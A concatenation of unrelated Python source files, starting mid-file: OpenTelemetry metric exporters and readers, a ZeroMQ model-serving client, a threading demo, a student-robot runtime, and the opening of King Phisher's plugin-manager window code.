DefaultAggregation,
)
from opentelemetry.sdk._metrics._internal.instrument import (
Counter,
Histogram,
ObservableCounter,
ObservableGauge,
ObservableUpDownCounter,
UpDownCounter,
)
from opentelemetry.sdk.environment_variables import (
_OTEL_EXPORTER_OTLP_METRICS_TEMPORALITY_PREFERENCE,
)
from opentelemetry.util._once import Once
from opentelemetry.util._time import _time_ns
_logger = getLogger(__name__)
class MetricExportResult(Enum):
"""Result of exporting a metric
Can be any of the following values:"""
SUCCESS = 0
FAILURE = 1
class MetricExporter(ABC):
"""Interface for exporting metrics.
Interface to be implemented by services that want to export metrics received
in their own format.
"""
@abstractmethod
def export(
self,
metrics: Sequence["opentelemetry.sdk._metrics.export.Metric"],
timeout_millis: float = 10_000,
**kwargs,
) -> MetricExportResult:
"""Exports a batch of telemetry data.
Args:
metrics: The list of `opentelemetry.sdk._metrics.export.Metric` objects to be exported
Returns:
The result of the export
"""
@abstractmethod
def shutdown(self, timeout_millis: float = 30_000, **kwargs) -> None:
"""Shuts down the exporter.
Called when the SDK is shut down.
"""
class ConsoleMetricExporter(MetricExporter):
"""Implementation of :class:`MetricExporter` that prints metrics to the
console.
This class can be used for diagnostic purposes. It prints the exported
metrics to the console STDOUT.
"""
def __init__(
self,
out: IO = stdout,
formatter: Callable[
["opentelemetry.sdk._metrics.export.Metric"], str
] = lambda metric: metric.to_json()
+ linesep,
):
self.out = out
self.formatter = formatter
def export(
self,
metrics: Sequence["opentelemetry.sdk._metrics.export.Metric"],
timeout_millis: float = 10_000,
**kwargs,
) -> MetricExportResult:
for metric in metrics:
self.out.write(self.formatter(metric))
self.out.flush()
return MetricExportResult.SUCCESS
def shutdown(self, timeout_millis: float = 30_000, **kwargs) -> None:
pass
class MetricReader(ABC):
"""
Base class for all metric readers
Args:
preferred_temporality: A mapping between instrument classes and
aggregation temporality. By default uses CUMULATIVE for all instrument
classes. This mapping will be used to define the default aggregation
temporality of every instrument class. If the user wants to make a
change in the default aggregation temporality of an instrument class,
it is enough to pass here a dictionary whose keys are the instrument
classes and the values are the corresponding desired aggregation
temporalities of the classes that the user wants to change, not all of
them. The classes not included in the passed dictionary will retain
their association to their default aggregation temporalities.
The value passed here will override the corresponding values set
via the environment variable
preferred_aggregation: A mapping between instrument classes and
aggregation instances. By default maps all instrument classes to an
instance of `DefaultAggregation`. This mapping will be used to
define the default aggregation of every instrument class. If the
user wants to make a change in the default aggregation of an
instrument class, it is enough to pass here a dictionary whose keys
are the instrument classes and the values are the corresponding
desired aggregation for the instrument classes that the user wants
to change, not necessarily all of them. The classes not included in
the passed dictionary will retain their association to their
default aggregations. The aggregation defined here will be
overriden by an aggregation defined by a view that is not
`DefaultAggregation`.
.. document protected _receive_metrics which is a intended to be overriden by subclass
.. automethod:: _receive_metrics
"""
# FIXME add :std:envvar:`OTEL_EXPORTER_OTLP_METRICS_TEMPORALITY_PREFERENCE`
# to the end of the documentation paragraph above.
def __init__(
self,
preferred_temporality: Dict[type, AggregationTemporality] = None,
preferred_aggregation: Dict[
type, "opentelemetry.sdk._metrics.view.Aggregation"
] = None,
) -> None:
self._collect: Callable[
[
"opentelemetry.sdk._metrics.export.MetricReader",
AggregationTemporality,
],
Iterable["opentelemetry.sdk._metrics.export.Metric"],
] = None
if (
environ.get(
_OTEL_EXPORTER_OTLP_METRICS_TEMPORALITY_PREFERENCE,
"CUMULATIVE",
)
.upper()
.strip()
== "DELTA"
):
self._instrument_class_temporality = {
Counter: AggregationTemporality.DELTA,
UpDownCounter: AggregationTemporality.CUMULATIVE,
Histogram: AggregationTemporality.DELTA,
ObservableCounter: AggregationTemporality.DELTA,
ObservableUpDownCounter: AggregationTemporality.CUMULATIVE,
ObservableGauge: AggregationTemporality.CUMULATIVE,
}
else:
self._instrument_class_temporality = {
Counter: AggregationTemporality.CUMULATIVE,
UpDownCounter: AggregationTemporality.CUMULATIVE,
Histogram: AggregationTemporality.CUMULATIVE,
ObservableCounter: AggregationTemporality.CUMULATIVE,
ObservableUpDownCounter: AggregationTemporality.CUMULATIVE,
ObservableGauge: AggregationTemporality.CUMULATIVE,
}
if preferred_temporality is not None:
for temporality in preferred_temporality.values():
if temporality not in (
AggregationTemporality.CUMULATIVE,
AggregationTemporality.DELTA,
):
raise Exception(
f"Invalid temporality value found {temporality}"
)
self._instrument_class_temporality.update(preferred_temporality or {})
self._preferred_temporality = preferred_temporality
self._instrument_class_aggregation = {
Counter: DefaultAggregation(),
UpDownCounter: DefaultAggregation(),
Histogram: DefaultAggregation(),
ObservableCounter: DefaultAggregation(),
ObservableUpDownCounter: DefaultAggregation(),
ObservableGauge: DefaultAggregation(),
}
self._instrument_class_aggregation.update(preferred_aggregation or {})
@final
def collect(self, timeout_millis: float = 10_000) -> None:
"""Collects the metrics from the internal SDK state and
invokes the `_receive_metrics` with the collection.
"""
if self._collect is None:
_logger.warning(
"Cannot call collect on a MetricReader until it is registered on a MeterProvider"
)
return
self._receive_metrics(
self._collect(self),
timeout_millis=timeout_millis,
)
@final
def _set_collect_callback(
self,
func: Callable[
[
"opentelemetry.sdk._metrics.export.MetricReader",
AggregationTemporality,
],
Iterable["opentelemetry.sdk._metrics.export.Metric"],
],
) -> None:
"""This function is internal to the SDK. It should not be called or overriden by users"""
self._collect = func
@abstractmethod
def _receive_metrics(
self,
metrics: Iterable["opentelemetry.sdk._metrics.export.Metric"],
timeout_millis: float = 10_000,
**kwargs,
) -> None:
"""Called by `MetricReader.collect` when it receives a batch of metrics"""
@abstractmethod
def shutdown(self, timeout_millis: float = 30_000, **kwargs) -> None:
"""Shuts down the MetricReader. This method provides a way
for the MetricReader to do any cleanup required. A metric reader can
only be shutdown once, any subsequent calls are ignored and return
failure status.
When a `MetricReader` is registered on a
:class:`~opentelemetry.sdk._metrics.MeterProvider`,
:meth:`~opentelemetry.sdk._metrics.MeterProvider.shutdown` will invoke this
automatically.
"""
class InMemoryMetricReader(MetricReader):
"""Implementation of `MetricReader` that returns its metrics from :func:`get_metrics`.
This is useful for e.g. unit tests.
"""
def __init__(
self,
preferred_temporality: Dict[type, AggregationTemporality] = None,
preferred_aggregation: Dict[
type, "opentelemetry.sdk._metrics.view.Aggregation"
] = None,
) -> None:
super().__init__(
preferred_temporality=preferred_temporality,
preferred_aggregation=preferred_aggregation,
)
self._lock = RLock()
self._metrics: List["opentelemetry.sdk._metrics.export.Metric"] = []
def get_metrics(self) -> List["opentelemetry.sdk._metrics.export.Metric"]:
"""Reads and returns current metrics from the SDK"""
with self._lock:
self.collect()
metrics = self._metrics
self._metrics = []
return metrics
def _receive_metrics(
self,
metrics: Iterable["opentelemetry.sdk._metrics.export.Metric"],
timeout_millis: float = 10_000,
**kwargs,
) -> None:
with self._lock:
self._metrics = list(metrics)
def shutdown(self, timeout_millis: float = 30_000, **kwargs) -> None:
pass
class PeriodicExportingMetricReader(MetricReader):
"""`PeriodicExportingMetricReader` is an implementation of `MetricReader`
that collects metrics based on a user-configurable time interval, and passes the
metrics to the configured exporter.
"""
def __init__(
self,
exporter: MetricExporter,
preferred_temporality: Dict[type, AggregationTemporality] = None,
preferred_aggregation: Dict[
type, "opentelemetry.sdk._metrics.view.Aggregation"
] = None,
export_interval_millis: Optional[float] = None,
export_timeout_millis: Optional[float] = None,
) -> None:
super().__init__(
preferred_temporality=preferred_temporality,
preferred_aggregation=preferred_aggregation,
)
self._exporter = exporter
if export_interval_millis is None:
try:
export_interval_millis = float(
environ.get("OTEL_METRIC_EXPORT_INTERVAL", 60000)
)
except ValueError:
_logger.warning(
"Found invalid value for export interval, using default"
)
export_interval_millis = 60000
if export_timeout_millis is None:
try:
export_timeout_millis = float(
environ.get("OTEL_METRIC_EXPORT_TIMEOUT", 30000)
)
except ValueError:
_logger.warning(
"Found invalid value for export timeout, using default"
)
export_timeout_millis = 30000
self._export_interval_millis = export_interval_millis
self._export_timeout_millis = export_timeout_millis
self._shutdown = False
self._shutdown_event = Event()
self._shutdown_once = Once()
self._daemon_thread = Thread(target=self._ticker, daemon=True)
self._daemon_thread.start()
if hasattr(os, "register_at_fork"):
os.register_at_fork(
after_in_child=self._at_fork_reinit
) # pylint: disable=protected-access
def _at_fork_reinit(self):
self._daemon_thread = Thread(target=self._ticker, daemon=True)
self._daemon_thread.start()
def _ticker(self) -> None:
interval_secs = self._export_interval_millis / 1e3
while not self._shutdown_event.wait(interval_secs):
self.collect(timeout_millis=self._export_timeout_millis)
# one last collection below before shutting down completely
self.collect(timeout_millis=self._export_interval_millis)
def _receive_metrics(
self,
metrics: Iterable["opentelemetry.sdk._metrics.export.Metric"],
timeout_millis: float = 10_000,
**kwargs,
) -> None:
if metrics is None:
return
token = attach(set_value(_SUPPRESS_INSTRUMENTATION_KEY, True))
try:
self._exporter.export(metrics, timeout_millis=timeout_millis)
except Exception as e: # pylint: disable=broad-except,invalid-name
_logger.exception("Exception while exporting metrics %s", str(e))
detach(token)
def shutdown(self, timeout_millis: float = 30_000, **kwargs) -> None:
deadline_ns = _time_ns() + timeout_millis * 10**6
def _shutdown():
self._shutdown = True
did_set = self._shutdown_once.do_once(_shutdown)
if not did_set:
_logger.warning("Can't shutdown multiple times")
return
self._shutdown_event.set()
self._daemon_thread.join(timeout=(deadline_ns - _time_ns()) / 10**9)
self._exporter.shutdown(timeout=(deadline_ns - _time_ns()) / 10**6)
|
__init__.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Han Xiao <[email protected]> <https://hanxiao.github.io>
import sys
import threading
import time
import uuid
from collections import namedtuple
from functools import wraps
import numpy as np
import zmq
from zmq.utils import jsonapi
__all__ = ['__version__', 'BaseClient', 'ConcurrentBaseClient']
# in the future client version must match with server version
__version__ = '0.0.1'
if sys.version_info >= (3, 0):
from ._py3_var import *
else:
from ._py2_var import *
# 从服务端返回的数据结构,
# send_multipart 结构是 [client_addr, x_info, x, req_id],x_info可以解析为json
# id是req_id, content是[client_addr, x_info, x, req_id]
_Response = namedtuple('_Response', ['id', 'content'])
# 解析上面的结构中的content:
# outputs为x(一个numpy ndarray,结构在x_info['shape'] x_info['dtype']中定义
# extra_infos也在x_info['extra_infos']中
Response = namedtuple('Response', ['id', 'outputs', 'extra_infos'])
class BaseClient(object):
def __init__(self, ip='localhost', port=5555, port_out=5556,
output_fmt='ndarray',
show_server_config=False,
identity=None,
check_version=True,
ignore_all_checks=False,
timeout=-1):
""" A client object connected to a BertServer
Create a BertClient that connects to a BertServer.
Note, server must be ready at the moment you are calling this function.
If you are not sure whether the server is ready, then please set `ignore_all_checks=True`
You can also use it as a context manager:
.. highlight:: python
.. code-block:: python
with BertClient() as bc:
bc.encode(...)
# bc is automatically closed out of the context
:type timeout: int
:type check_version: bool
:type ignore_all_checks: bool
:type identity: str
:type show_server_config: bool
:type output_fmt: str
:type port_out: int
:type port: int
:type ip: str
:param ip: the ip address of the server
:param port: port for pushing data from client to server, must be consistent with the server side config
:param port_out: port for publishing results from server to client, must be consistent with the server side config
:param output_fmt: the output format of the sentence encodes, either in numpy array or python List[List[float]] (ndarray/list)
:param show_server_config: whether to show server configs when first connected
:param identity: the UUID of this client
:param check_version: check if server has the same version as client, raise AttributeError if not the same
:param check_length: check if server `max_seq_len` is less than the sentence length before sent
:param check_token_info: check if server can return tokenization
:param ignore_all_checks: ignore all checks, set it to True if you are not sure whether the server is ready when constructing BertClient()
:param timeout: set the timeout (milliseconds) for receive operation on the client, -1 means no timeout and wait until result returns
"""
self.context = zmq.Context()
self.sender = self.context.socket(zmq.PUSH)
self.sender.setsockopt(zmq.LINGER, 0)
self.identity = identity or str(uuid.uuid4()).encode('ascii')
self.sender.connect('tcp://%s:%d' % (ip, port))
self.receiver = self.context.socket(zmq.SUB)
self.receiver.setsockopt(zmq.LINGER, 0)
self.receiver.setsockopt(zmq.SUBSCRIBE, self.identity)
self.receiver.connect('tcp://%s:%d' % (ip, port_out))
self.request_id = 0
self.timeout = timeout
self.pending_request = set()
self.pending_response = {}
if output_fmt == 'ndarray':
self.formatter = lambda x: x
elif output_fmt == 'list':
self.formatter = lambda x: x.tolist()
else:
raise AttributeError('"output_fmt" must be "ndarray" or "list"')
self.output_fmt = output_fmt
self.port = port
self.port_out = port_out
self.ip = ip
self.check_version = check_version
if not ignore_all_checks and (check_version or show_server_config):
s_status = self.server_config
if check_version and s_status['server_version'] != self.client_status['client_version']:
raise AttributeError('version mismatch! server version is %s but client version is %s!\n'
'consider "pip install -U model-serving-server model-serving-client"\n'
'or disable version-check by "BaseClient(check_version=False)"' % (
s_status['server_version'], self.client_status['client_version']))
if show_server_config:
self._print_dict(s_status, 'server config:')
self.check_status(s_status)
def check_status(self, s_status):
pass
def close(self):
"""
Gently close all connections of the client. If you are using BertClient as context manager,
then this is not necessary.
"""
self.sender.close()
self.receiver.close()
self.context.term()
def _send(self, msg: bytes, msg_len: int = 0, extra_params: bytes = b''):
self.request_id += 1
# 发送n个二进制数据 http://wiki.zeromq.org/blog:zero-copy
self.sender.send_multipart([self.identity, msg, b'%d' % self.request_id, b'%d' % msg_len, extra_params])
self.pending_request.add(self.request_id)
return self.request_id
def _recv(self, wait_for_req_id=None):
try:
while True:
# a request has been returned and found in pending_response
if wait_for_req_id in self.pending_response:
response = self.pending_response.pop(wait_for_req_id)
return _Response(wait_for_req_id, response)
# receive a response
response = self.receiver.recv_multipart()
request_id = int(response[-1])
# if not wait for particular response then simply return
if not wait_for_req_id or (wait_for_req_id == request_id):
self.pending_request.remove(request_id)
return _Response(request_id, response)
elif wait_for_req_id != request_id:
self.pending_response[request_id] = response
# wait for the next response
except Exception as e:
raise e
finally:
if wait_for_req_id in self.pending_request:
self.pending_request.remove(wait_for_req_id)
def _recv_ndarray(self, wait_for_req_id=None):
request_id, response = self._recv(wait_for_req_id)
# response : [client_addr, x_info, x, req_id]
arr_info, arr_val = jsonapi.loads(response[1]), response[2]
# todo _buffer--memoryview的作用,防止内存拷贝
X = np.frombuffer(_buffer(arr_val), dtype=str(arr_info['dtype']))
return Response(request_id, self.formatter(X.reshape(arr_info['shape'])), arr_info.get('extra_infos', ''))
@property
def client_status(self):
"""
Get the status of this BertClient instance
:rtype: dict[str, str]
:return: a dictionary contains the status of this BertClient instance
"""
return {
'identity': self.identity,
'num_request': self.request_id,
'num_pending_request': len(self.pending_request),
'pending_request': self.pending_request,
'output_fmt': self.output_fmt,
'port': self.port,
'port_out': self.port_out,
'server_ip': self.ip,
'client_version': __version__,
'timeout': self.timeout
}
def _timeout(func):
@wraps(func)
def arg_wrapper(self, *args, **kwargs):
if 'blocking' in kwargs and not kwargs['blocking']:
# override client timeout setting if `func` is called in non-blocking way
self.receiver.setsockopt(zmq.RCVTIMEO, -1)
else:
self.receiver.setsockopt(zmq.RCVTIMEO, self.timeout)
try:
return func(self, *args, **kwargs)
except zmq.error.Again as _e:
t_e = TimeoutError(
'no response from the server (with "timeout"=%d ms), please check the following:'
'is the server still online? is the network broken? are "port" and "port_out" correct? '
'are you encoding a huge amount of data whereas the timeout is too small for that?' % self.timeout)
if _py2:
raise t_e
else:
_raise(t_e, _e)
finally:
self.receiver.setsockopt(zmq.RCVTIMEO, -1)
return arg_wrapper
@property
@_timeout
def server_config(self):
"""
Get the current configuration of the server connected to this client
:return: a dictionary contains the current configuration of the server connected to this client
:rtype: dict[str, str]
"""
req_id = self._send(b'SHOW_CONFIG')
return jsonapi.loads(self._recv(req_id).content[1])
@property
@_timeout
def server_status(self):
"""
Get the current status of the server connected to this client
:return: a dictionary contains the current status of the server connected to this client
:rtype: dict[str, str]
"""
req_id = self._send(b'SHOW_STATUS')
return jsonapi.loads(self._recv(req_id).content[1])
@_timeout
def infer(self, inputs, blocking=True):
""" infer a list of input to a list of vectors
`texts` should be a list of strings, each of which represents a sentence.
If `is_tokenized` is set to True, then `texts` should be list[list[str]],
outer list represents sentence and inner list represent tokens in the sentence.
Note that if `blocking` is set to False, then you need to fetch the result manually afterwards.
.. highlight:: python
.. code-block:: python
with BertClient() as bc:
# encode untokenized sentences
bc.encode(['First do it',
'then do it right',
'then do it better'])
# encode tokenized sentences
bc.encode([['First', 'do', 'it'],
['then', 'do', 'it', 'right'],
['then', 'do', 'it', 'better']], is_tokenized=True)
:type is_tokenized: bool
:type show_tokens: bool
:type blocking: bool
:type timeout: bool
:type texts: list[str] or list[list[str]]
:param is_tokenized: whether the input texts is already tokenized
:param show_tokens: whether to include tokenization result from the server. If true, the return of the function will be a tuple
:param texts: list of sentence to be encoded. Larger list for better efficiency.
:param blocking: wait until the encoded result is returned from the server. If false, will immediately return.
:param timeout: throw a timeout error when the encoding takes longer than the predefined timeout.
:return: encoded sentence/token-level embeddings, rows correspond to sentences
:rtype: numpy.ndarray or list[list[float]]
"""
self._check_input_lst(inputs)
req_id = self._send(jsonapi.dumps(inputs), len(inputs))
if not blocking:
return None
r = self._recv_ndarray(req_id)
return r.outputs, r.extra_infos
def fetch(self, delay=.0):
""" Fetch the encoded vectors from server, use it with `encode(blocking=False)`
Use it after `encode(texts, blocking=False)`. If there is no pending requests, will return None.
Note that `fetch()` does not preserve the order of the requests! Say you have two non-blocking requests,
R1 and R2, where R1 with 256 samples, R2 with 1 samples. It could be that R2 returns first.
To fetch all results in the original sending order, please use `fetch_all(sort=True)`
:type delay: float
:param delay: delay in seconds and then run fetcher
:return: a generator that yields request id and encoded vector in a tuple, where the request id can be used to determine the order
:rtype: Iterator[tuple(int, numpy.ndarray)]
"""
time.sleep(delay)
while self.pending_request:
yield self._recv_ndarray()
def fetch_all(self, sort=True, concat=False):
""" Fetch all encoded vectors from server, use it with `encode(blocking=False)`
Use it `encode(texts, blocking=False)`. If there is no pending requests, it will return None.
:type sort: bool
:type concat: bool
:param sort: sort results by their request ids. It should be True if you want to preserve the sending order
:param concat: concatenate all results into one ndarray
:return: encoded sentence/token-level embeddings in sending order
:rtype: numpy.ndarray or list[list[float]]
"""
if self.pending_request:
tmp = list(self.fetch())
if sort:
tmp = sorted(tmp, key=lambda v: v.id)
tmp = [v.outputs for v in tmp]
if concat:
if self.output_fmt == 'ndarray':
tmp = np.concatenate(tmp, axis=0)
elif self.output_fmt == 'list':
tmp = [vv for v in tmp for vv in v]
return tmp
def infer_async(self, batch_generator, max_num_batch=None, delay=0.1, **kwargs):
""" Async encode batches from a generator
:param delay: delay in seconds and then run fetcher
:param batch_generator: a generator that yields list[str] or list[list[str]] (for `is_tokenized=True`) every time
:param max_num_batch: stop after encoding this number of batches
:param `**kwargs`: the rest parameters please refer to `encode()`
:return: a generator that yields encoded vectors in ndarray, where the request id can be used to determine the order
:rtype: Iterator[tuple(int, numpy.ndarray)]
"""
def run():
cnt = 0
for inputs in batch_generator:
self.infer(inputs, blocking=False, **kwargs)
cnt += 1
if max_num_batch and cnt == max_num_batch:
break
t = threading.Thread(target=run)
t.start()
return self.fetch(delay)
@staticmethod
def _check_input_lst(inputs):
if not isinstance(inputs, list):
raise TypeError('"%s" must be %s, but received %s' % (inputs, type([]), type(inputs)))
@staticmethod
def _print_dict(x, title=None):
if title:
print(title)
for k, v in x.items():
print('%30s\t=\t%-30s' % (k, v))
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
class BCManager():
def __init__(self, available_bc):
self.available_bc = available_bc
self.bc = None
def __enter__(self):
self.bc = self.available_bc.pop()
return self.bc
def __exit__(self, *args):
self.available_bc.append(self.bc)
class ConcurrentBaseClient(BaseClient):
def __init__(self, max_concurrency=10, **kwargs):
""" A thread-safe client object connected to a BertServer
Create a BertClient that connects to a BertServer.
Note, server must be ready at the moment you are calling this function.
If you are not sure whether the server is ready, then please set `check_version=False` and `check_length=False`
:type max_concurrency: int
:param max_concurrency: the maximum number of concurrent connections allowed
"""
try:
from model_serving.client import BaseClient
except ImportError:
raise ImportError('BertClient module is not available, it is required for serving HTTP requests.'
'Please use "pip install -U bert-serving-client" to install it.'
'If you do not want to use it as an HTTP server, '
'then remove "-http_port" from the command line.')
self.available_bc = [BaseClient(**kwargs) for _ in range(max_concurrency)]
self.max_concurrency = max_concurrency
def close(self):
for bc in self.available_bc:
bc.close()
def _concurrent(func):
@wraps(func)
def arg_wrapper(self, *args, **kwargs):
try:
with BCManager(self.available_bc) as bc:
f = getattr(bc, func.__name__)
r = f if isinstance(f, dict) else f(*args, **kwargs)
return r
except IndexError:
raise RuntimeError('Too many concurrent connections!'
'Try to increase the value of "max_concurrency", '
'currently =%d' % self.max_concurrency)
return arg_wrapper
@_concurrent
def infer(self, **kwargs):
pass
@property
@_concurrent
def server_config(self):
pass
@property
@_concurrent
def server_status(self):
pass
@property
@_concurrent
def client_status(self):
pass
def fetch(self, **kwargs):
raise NotImplementedError('Async encoding of "ConcurrentBaseClient" is not implemented yet')
def fetch_all(self, **kwargs):
raise NotImplementedError('Async encoding of "ConcurrentBaseClient" is not implemented yet')
def infer_async(self, **kwargs):
raise NotImplementedError('Async encoding of "ConcurrentBaseClient" is not implemented yet')
|
multiple_variables_with_threads.py
|
import threading
import queue
def print_cube(num):
"""
function to print cube of given num
"""
print("Cube: {}".format(num * num * num))
def print_square(count,row,q1):
"""
function to print square of given num
"""
count +=1
row +=1
q1.put(count)
#q1.put(row)
# print("Square: {}".format(num * num))
if __name__ == "__main__":
count=0
row=0
print('hi')
# creating thread
q1=queue.Queue()
t1 = threading.Thread(target=print_square, args=(count,row,q1))
# t2 = threading.Thread(target=print_cube, args=(10,))
# starting thread 1
t1.start()
# starting thread 2
#t2.start()
# wait until thread 1 is completely executed
t1.join()
count=q1.get()
#row=q1.get()
print('count post',count)
print('row post', row)
# wait until thread 2 is completely executed
# t2.join()
# both threads completely executed
print("Done!")
|
runtime.py
|
import subprocess, multiprocessing, time
import memcache, ansible, hibike
from grizzly import *
import usb
import os
# Useful motor mappings
name_to_grizzly, name_to_values, name_to_ids = {}, {}, {}
student_proc, console_proc = None, None
robot_status = 0 # a boolean for whether or not the robot is executing code
if 'HIBIKE_SIMULATOR' in os.environ and os.environ['HIBIKE_SIMULATOR'] in ['1', 'True', 'true']:
import hibike_simulator
h = hibike_simulator.Hibike()
else:
h = hibike.Hibike()
connectedDevices = h.getEnumeratedDevices()
print connectedDevices
# TODO: delay should not always be 20
connectedDevices = [(device, 50) for (device, device_type) in connectedDevices]
h.subToDevices(connectedDevices)
# connect to memcache
memcache_port = 12357
mc = memcache.Client(['127.0.0.1:%d' % memcache_port])
mc.set('gamepad', {0: {'axes': [0,0,0,0], 'buttons': None, 'connected': None, 'mapping': None}})
def get_all_data(connectedDevices):
all_data = {}
for t in connectedDevices:
count = 1
tup_nest = h.getData(t[0], "dataUpdate")
if not tup_nest:
continue
tup_vals = tup_nest[0]
for i in tup_vals:
all_data[str(count) + str(t[0])] = i
count += 1
return all_data
# Called on starte of student code, finds and configures all the connected motors
def initialize_motors():
try:
addrs = Grizzly.get_all_ids()
except usb.USBError:
print("WARNING: no Grizzly Bear devices found")
addrs = []
# Brute force to find all
for index in range(len(addrs)):
# default name for motors is motor0, motor1, motor2, etc
grizzly_motor = Grizzly(addrs[index])
grizzly_motor.set_mode(ControlMode.NO_PID, DriveMode.DRIVE_COAST)
grizzly_motor.set_target(0)
name_to_grizzly['motor' + str(index)] = grizzly_motor
name_to_values['motor' + str(index)] = 0
name_to_ids['motor' + str(index)] = addrs[index]
mc.set('motor_values', name_to_values)
# Called on end of student code, sets all motor values to zero
def stop_motors():
for name, grizzly in name_to_grizzly.iteritems():
grizzly.set_target(0)
name_to_values[name] = 0
mc.set('motor_values', name_to_values)
# A process for sending the output of student code to the UI
def log_output(stream):
#TODO: figure out a way to limit speed of sending messages, so
# ansible is not overflowed by printing too fast
for line in stream:
ansible.send_message('UPDATE_CONSOLE', {
'console_output': {
'value': line
}
})
def msg_handling(msg):
global robot_status, student_proc, console_proc
msg_type, content = msg['header']['msg_type'], msg['content']
if msg_type == 'execute' and not robot_status:
with open('student_code.py', 'w+') as f:
f.write(msg['content']['code'])
student_proc = subprocess.Popen(['python', '-u', 'student_code.py'],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
# turns student process stdout into a stream for sending to frontend
lines_iter = iter(student_proc.stdout.readline, b'')
# start process for watching for student code output
console_proc = multiprocessing.Process(target=log_output, args=(lines_iter,))
console_proc.start()
initialize_motors()
robot_status= 1
elif msg_type == 'stop' and robot_status:
student_proc.terminate()
console_proc.terminate()
stop_motors()
robot_status = 0
peripheral_data_last_sent = 0
def send_peripheral_data(data):
global peripheral_data_last_sent
# TODO: This is a hack. Should put this into a separate process
if time.time() < peripheral_data_last_sent + 1:
return
peripheral_data_last_sent = time.time()
# Send sensor data
for device_id, value in data.items():
ansible.send_message('UPDATE_PERIPHERAL', {
'peripheral': {
'name': 'sensor_{}'.format(device_id),
'peripheralType':'SENSOR_BOOLEAN',
'value': value,
'id': device_id
}
})
while True:
msg = ansible.recv()
# Handle any incoming commands from the UI
if msg:
msg_handling(msg)
# Send whether or not robot is executing code
ansible.send_message('UPDATE_STATUS', {
'status': {'value': robot_status}
})
# Send battery level
ansible.send_message('UPDATE_BATTERY', {
'battery': {
'value': 100 # TODO: Make this not a lie
}
})
ansible.send_message('UPDATE_PERIPHERAL', {
'peripheral': {
'name': name,
'peripheralType':'MOTOR_SCALAR',
'value': name_to_value[name],
'id': name_to_ids[name]
}
})
# Update sensor values, and send to UI
all_sensor_data = get_all_data(connectedDevices)
send_peripheral_data(all_sensor_data)
mc.set('sensor_values', all_sensor_data)
# Send motor values to UI, if the robot is running
if robot_status:
name_to_value = mc.get('motor_values') or {}
for name in name_to_value:
grizzly = name_to_grizzly[name]
try:
grizzly.set_target(name_to_value[name])
except:
stop_motors()
time.sleep(0.05)
|
plugin_manager.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# king_phisher/client/windows/plugin_manager.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import collections
import copy
import datetime
import errno
import functools
import os
import sys
import traceback
import xml.sax.saxutils as saxutils
from king_phisher import startup
from king_phisher import utilities
from king_phisher.catalog import Catalog
from king_phisher.client import plugins
from king_phisher.client import gui_utilities
from king_phisher.client.widget import managers
from king_phisher.client.windows import html
from gi.repository import Gdk
from gi.repository import Gtk
import requests.exceptions
import smoke_zephyr.requirements
import smoke_zephyr.utilities
__all__ = ('PluginManagerWindow',)
_ROW_TYPE_PLUGIN = 'plugin'
_ROW_TYPE_REPOSITORY = 'repository'
_ROW_TYPE_CATALOG = 'catalog'
_LOCAL_REPOSITORY_ID = 'local'
_LOCAL_REPOSITORY_TITLE = '[Locally Installed]'
_ModelNamedRow = collections.namedtuple('ModelNamedRow', (
'id',
'installed',
'enabled',
'title',
'compatibility',
'version',
'visible_enabled',
'visible_installed',
'sensitive_installed',
'type'
))
class _ModelNode(object):
__slots__ = ('children', 'row')
def __init__(self, *args, **kwargs):
self.row = _ModelNamedRow(*args, **kwargs)
self.children = collections.deque()
class PluginDocumentationWindow(html.HTMLWindow):
"""
A window for displaying plugin documentation from their respective README.md
files. If the documentation file can not be found a
:py:exc:`.FileNotFoundError` exception will be raised on initialization. The
contents of the README.md file is then rendered as markdown data and
displayed using an :py:class:`~king_phisher.client.windows.html.HTMLWindow`.
The plugin must be loaded into the
:py:attr:`~king_phisher.client.application.KingPhisherClientApplication.plugin_manager`
but does not have to be enabled for documentation to be displayed.
"""
template = 'plugin-documentation.html'
"""The Jinja2 HTML template to load for hosting the rendered markdown documentation."""
def __init__(self, application, plugin_id):
"""
:param application: The parent application for this object.
:type application: :py:class:`Gtk.Application`
:param str plugin_id: The identifier of this plugin.
"""
super(PluginDocumentationWindow, self).__init__(application)
plugin_path = self.application.plugin_manager.get_plugin_path(plugin_id)
if plugin_path is None:
raise FileNotFoundError(errno.ENOENT, "could not find the data path for plugin '{0}'".format(plugin_id))
md_file = os.path.join(plugin_path, 'README.md')
if md_file is None or not os.path.isfile(md_file):
raise FileNotFoundError(errno.ENOENT, "plugin '{0}' has no documentation".format(plugin_id), md_file)
self._md_file = md_file
self._plugin = self.application.plugin_manager[plugin_id]
self.refresh()
self.webview.connect('key-press-event', self.signal_key_press_event)
self.webview.connect('open-remote-uri', self.signal_webview_open_remote_uri)
self.window.set_title('Plugin Documentation')
def refresh(self):
"""
Refresh the contents of the documentation. This will reload both the
markdown content from README.md as well as the HTML template file.
"""
